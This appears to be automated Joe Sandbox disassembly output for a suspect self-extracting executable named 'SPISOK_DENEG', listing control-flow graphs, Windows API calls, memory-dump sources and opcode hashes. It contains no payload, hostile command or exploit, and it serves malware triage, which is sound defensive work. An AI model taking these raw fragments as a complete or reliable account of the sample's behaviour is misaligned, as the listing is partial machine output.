                                                            control_flow_graph 993 d98e0-d9901 call eec50 996 d990c 993->996 997 d9903-d9906 993->997 998 d990e-d991f 996->998 997->996 999 d9908-d990a 997->999 1000 d9927-d9931 998->1000 1001 d9921 998->1001 999->998 1002 d9936-d9943 call d6edb 1000->1002 1003 d9933 1000->1003 1001->1000 1006 d994b-d996a CreateFileW 1002->1006 1007 d9945 1002->1007 1003->1002 1008 d996c-d998e GetLastError call dbb03 1006->1008 1009 d99bb-d99bf 1006->1009 1007->1006 1013 d99c8-d99cd 1008->1013 1018 d9990-d99b3 CreateFileW GetLastError 1008->1018 1011 d99c3-d99c6 1009->1011 1012 d99d9-d99de 1011->1012 1011->1013 1016 d99ff-d9a10 1012->1016 1017 d99e0-d99e3 1012->1017 1013->1012 1015 d99cf 1013->1015 1015->1012 1020 d9a2e-d9a39 1016->1020 1021 d9a12-d9a2a call e0602 1016->1021 1017->1016 1019 d99e5-d99f9 SetFileTime 1017->1019 1018->1011 1022 d99b5-d99b9 1018->1022 1019->1016 1021->1020 1022->1011
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,000D7760,?,00000005,?,00000011), ref: 000D995F
                                                            • GetLastError.KERNEL32(?,?,000D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,000D7760,?,00000005,?), ref: 000D99A2
                                                            • GetLastError.KERNEL32(?,?,000D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: ca4004d9684ae1c752cbd21686c438027bdf3f7b9062754bf10e21e1081654ec
                                                            • Instruction ID: 486814f08d679aa75712737f5380f6cf0c2ffacddf0e3fcd7fbf0a7d9f6b1b1f
                                                            • Opcode Fuzzy Hash: ca4004d9684ae1c752cbd21686c438027bdf3f7b9062754bf10e21e1081654ec
                                                            • Instruction Fuzzy Hash: 913104305447456FE7309F28CC46BDAFBD8BB04320F200B1AF9E5962D1D7B4A985CBA5

                                                            Control-flow Graph
                                                            control_flow_graph 1052 eb568-eb581 PeekMessageW 1053 eb5bc-eb5be 1052->1053 1054 eb583-eb597 GetMessageW 1052->1054 1055 eb5a8-eb5b6 TranslateMessage DispatchMessageW 1054->1055 1056 eb599-eb5a6 IsDialogMessageW 1054->1056 1055->1053 1056->1053 1056->1055
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                            • IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                            • TranslateMessage.USER32(?), ref: 000EB5AC
                                                            • DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: ec8f10285a2bd694f990a87839b406c52a5df0d8b3c8f3d24bbc34ab598fb44a
                                                            • Instruction ID: 151bcfcb531b2a29da996328cf10c56b6b6b547cbcd3c697a15a93fb41cf0674
                                                            • Opcode Fuzzy Hash: ec8f10285a2bd694f990a87839b406c52a5df0d8b3c8f3d24bbc34ab598fb44a
                                                            • Instruction Fuzzy Hash: C7F0D072A0115AABCB249BE6DC4CEDF7FBCEF053917004415B915E2410EB34D645CBB4

                                                            Control-flow Graph
                                                            control_flow_graph 1057 eabab-eabca GetClassNameW 1058 eabcc-eabe1 call e1fbb 1057->1058 1059 eabf2-eabf4 1057->1059 1064 eabe3-eabef FindWindowExW 1058->1064 1065 eabf1 1058->1065 1061 eabff-eac01 1059->1061 1062 eabf6-eabf9 SHAutoComplete 1059->1062 1062->1061 1064->1065 1065->1059
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 000EABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 000EABF9
                                                              • Part of subcall function 000E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000DC116,00000000,.exe,?,?,00000800,?,?,?,000E8E3C), ref: 000E1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 000EABE9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 6d09b85f9d4eae65d46537d2cf7238fe5de1707d6eead0ea5c6de87d3de8a34a
                                                            • Instruction ID: c8b8b070ad1dfb7f5c2c8fa3f94d97c126c18462ec32d2fed63b94263f27d0fb
                                                            • Opcode Fuzzy Hash: 6d09b85f9d4eae65d46537d2cf7238fe5de1707d6eead0ea5c6de87d3de8a34a
                                                            • Instruction Fuzzy Hash: 8BF0A7367006687FDB2057259C49FDB76AC9F47B41F484021BA05F31C1DB60EE8185FA

                                                            Control-flow Graph
                                                            control_flow_graph 1066 eac16-eac7b call e081b OleInitialize GdiplusStartup SHGetMalloc
                                                            APIs
                                                              • Part of subcall function 000E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                              • Part of subcall function 000E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            • OleInitialize.OLE32(00000000), ref: 000EAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000EAC66
                                                            • SHGetMalloc.SHELL32(00118438), ref: 000EAC70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: 17ec9903af708e6e89244e0de85710c7c32951920636ab35763444428a8ad2ce
                                                            • Instruction ID: bdd4e1e9862badb7b84b4a679c68cc2c48f887a91b97f0b75f0887f98ee86a2d
                                                            • Opcode Fuzzy Hash: 17ec9903af708e6e89244e0de85710c7c32951920636ab35763444428a8ad2ce
                                                            • Instruction Fuzzy Hash: 09F0F9B1900249ABCB10AFAAD9499EFFBFCEF84700F00415AA955E2251DBB456858BA1

                                                            Control-flow Graph
                                                            control_flow_graph 1070 edbde-edc12 call eec50 SetEnvironmentVariableW call e0371 1075 edc36-edc38 1070->1075 1076 edc14-edc18 1070->1076 1077 edc21-edc28 call e048d 1076->1077 1080 edc1a-edc20 1077->1080 1081 edc2a-edc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000EDBF4
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000EDC30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 7e3ecd657cb327543fe6b29af9c87c33048d8833873da9551468cb1008076868
                                                            • Instruction ID: 740ae1f83615e417f253c584e108e99fb8cddefcdca81359ac8350c63c26764e
                                                            • Opcode Fuzzy Hash: 7e3ecd657cb327543fe6b29af9c87c33048d8833873da9551468cb1008076868
                                                            • Instruction Fuzzy Hash: 87F0A7B2405265AECB202B968C06BEB3B9CEF08781B140452BDC5B5092D6F08980DAB0

                                                            Control-flow Graph
                                                            control_flow_graph 1082 d9785-d9791 1083 d979e-d97b5 ReadFile 1082->1083 1084 d9793-d979b GetStdHandle 1082->1084 1085 d97b7-d97c0 call d98bc 1083->1085 1086 d9811 1083->1086 1084->1083 1090 d97d9-d97dd 1085->1090 1091 d97c2-d97ca 1085->1091 1088 d9814-d9817 1086->1088 1092 d97df-d97e8 GetLastError 1090->1092 1093 d97ee-d97f2 1090->1093 1091->1090 1094 d97cc 1091->1094 1092->1093 1095 d97ea-d97ec 1092->1095 1096 d980c-d980f 1093->1096 1097 d97f4-d97fc 1093->1097 1098 d97cd-d97d7 call d9785 1094->1098 1095->1088 1096->1088 1097->1096 1100 d97fe-d9807 GetLastError 1097->1100 1098->1088 1100->1096 1102 d9809-d980a 1100->1102 1102->1098
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 000D9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000D97AD
                                                            • GetLastError.KERNEL32 ref: 000D97DF
                                                            • GetLastError.KERNEL32 ref: 000D97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 627053b7bb222d22930b9e97c3f62c3f1dc12666f91b225853d4dac24e7f4ebe
                                                            • Instruction ID: 08be0df672447f8861a0de4b8c45ef8e8e1724f9339f23b6fb18df8c4801d2c7
                                                            • Opcode Fuzzy Hash: 627053b7bb222d22930b9e97c3f62c3f1dc12666f91b225853d4dac24e7f4ebe
                                                            • Instruction Fuzzy Hash: 24118230914304EBDF705F65C80466D77E9FB42721F10852BF86695790DB749E84EB71
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000F3F73,00000000,00000000,?,000FACDB,000F3F73,00000000,00000000,00000000,?,000FAED8,00000006,FlsSetValue), ref: 000FAD66
                                                            • GetLastError.KERNEL32(?,000FACDB,000F3F73,00000000,00000000,00000000,?,000FAED8,00000006,FlsSetValue,00107970,FlsSetValue,00000000,00000364,?,000F98B7), ref: 000FAD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000FACDB,000F3F73,00000000,00000000,00000000,?,000FAED8,00000006,FlsSetValue,00107970,FlsSetValue,00000000), ref: 000FAD80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: c1fbd42bd2e3b822ab4fe4e095e61665596b7bb58e42912ccf087ef2493be80a
                                                            • Instruction ID: b1795003e7f308478977c1edac934eb142d7164668c74eda344e0f0881e669cd
                                                            • Opcode Fuzzy Hash: c1fbd42bd2e3b822ab4fe4e095e61665596b7bb58e42912ccf087ef2493be80a
                                                            • Instruction Fuzzy Hash: F701477671122AABC7314B689C44A6B7B9CEF067A27100220FA5BD3D51C724D84196E1
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,000DD343,00000001,?,?,?,00000000,000E551D,?,?,?), ref: 000D9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000E551D,?,?,?,?,?,000E4FC7,?), ref: 000D9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,000DD343,00000001,?,?), ref: 000DA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: fea197bbcfb2174e304acfc5eee00890bf5613f0f6f56779e5ee2df5717a28a7
                                                            • Instruction ID: 12765d1a135d28d7cf152de1ea4ba1e4907f0e82c586547e17c4482d45def614
                                                            • Opcode Fuzzy Hash: fea197bbcfb2174e304acfc5eee00890bf5613f0f6f56779e5ee2df5717a28a7
                                                            • Instruction Fuzzy Hash: 1831A271244305AFDB14CF20D808BAE7BA9FF85715F04452AF58597390CB759D88CBB2
                                                            APIs
                                                              • Part of subcall function 000DC27E: _wcslen.LIBCMT ref: 000DC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 260a11f51f42bcf1d35725e8d78a8ece72347899c6e9839f3fc93d2cd263fe9d
                                                            • Instruction ID: 2f4814bdc8ab96d1b7c118377828a6014e77c8476ccdb593647d852e4da04b8d
                                                            • Opcode Fuzzy Hash: 260a11f51f42bcf1d35725e8d78a8ece72347899c6e9839f3fc93d2cd263fe9d
                                                            • Instruction Fuzzy Hash: 2801B131300314AAEF61AB758C09BFE328DAF0B780F044417F941E6286D7A8CB81C6B6
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 000FB8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 63c8ba075c251e937d08869cca34d719b267a8a332830dcecf492868c9b81786
                                                            • Instruction ID: 02e2f2040352e878f6b509bf1fab3b1e50f63cb73321e27fa3b8f2c9dbcc9e44
                                                            • Opcode Fuzzy Hash: 63c8ba075c251e937d08869cca34d719b267a8a332830dcecf492868c9b81786
                                                            • Instruction Fuzzy Hash: 6341F97050828C9EDB218E64CC84BFABBEDDB45304F1404EDE7DA86542D375AA45EF61
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 000FAFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 46846d7110f75f1ac94594382097848d823ebc0ae5d91e59f734343242c70271
                                                            • Instruction ID: 39bf61cc26411e7d18351dbcd38b2578b26046bd90e4af0a592d127834ae3663
                                                            • Opcode Fuzzy Hash: 46846d7110f75f1ac94594382097848d823ebc0ae5d91e59f734343242c70271
                                                            • Instruction Fuzzy Hash: FD01487260420DBBCF029F90DC06DEE7FA6EF09764F014154FE18261A1CB729A71EB91
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,000FA56F), ref: 000FAF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: c21aba7bf0e28cbe727873d723a4e2bb58113b86d4b137f2f1df6e831cfac9a8
                                                            • Instruction ID: 8e537f0f24ceebb3d34bcd581241555860dfbb76ea408e66a37e5ed6b9aa3bee
                                                            • Opcode Fuzzy Hash: c21aba7bf0e28cbe727873d723a4e2bb58113b86d4b137f2f1df6e831cfac9a8
                                                            • Instruction Fuzzy Hash: 2EF0E971A4520CBFCF126F51CC06CAEBFA5EF09721B404064FD185A2A0DBB15E10A7D5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: c73a2502ac94798f94292c551633673bf5600f9fc2eaaff108073784f878c2af
                                                            • Instruction ID: 436524c2ff0c6f36e827cad2d8d9a8647f2d114f69ed198c69eed5079f87f52a
                                                            • Opcode Fuzzy Hash: c73a2502ac94798f94292c551633673bf5600f9fc2eaaff108073784f878c2af
                                                            • Instruction Fuzzy Hash: 4BE05570B4020C7BC201AB65CC02D7EBB94DB09730B000098F94AA76C0CFF06E4092C6
                                                            APIs
                                                              • Part of subcall function 000FB7BB: GetOEMCP.KERNEL32(00000000,?,?,000FBA44,?), ref: 000FB7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,000FBA89,?,00000000), ref: 000FBC64
                                                            • GetCPInfo.KERNEL32(00000000,000FBA89,?,?,?,000FBA89,?,00000000), ref: 000FBC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: a70638be62ce8ad6b9e956e1628ee9224c4df943889917ebb6e40eb96201a98f
                                                            • Instruction ID: 728016beb8ec84259f5d147fda2a8ae44da2f2c968fd2f89b61f53da87d292a8
                                                            • Opcode Fuzzy Hash: a70638be62ce8ad6b9e956e1628ee9224c4df943889917ebb6e40eb96201a98f
                                                            • Instruction Fuzzy Hash: E3515670A0024D9FDB20DF75C8816FBBBE5EF41300F28446ED6968BA52EB349941EF91
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,000D9A50,?,?,00000000,?,?,000D8CBC,?), ref: 000D9BAB
                                                            • GetLastError.KERNEL32(?,00000000,000D8411,-00009570,00000000,000007F3), ref: 000D9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
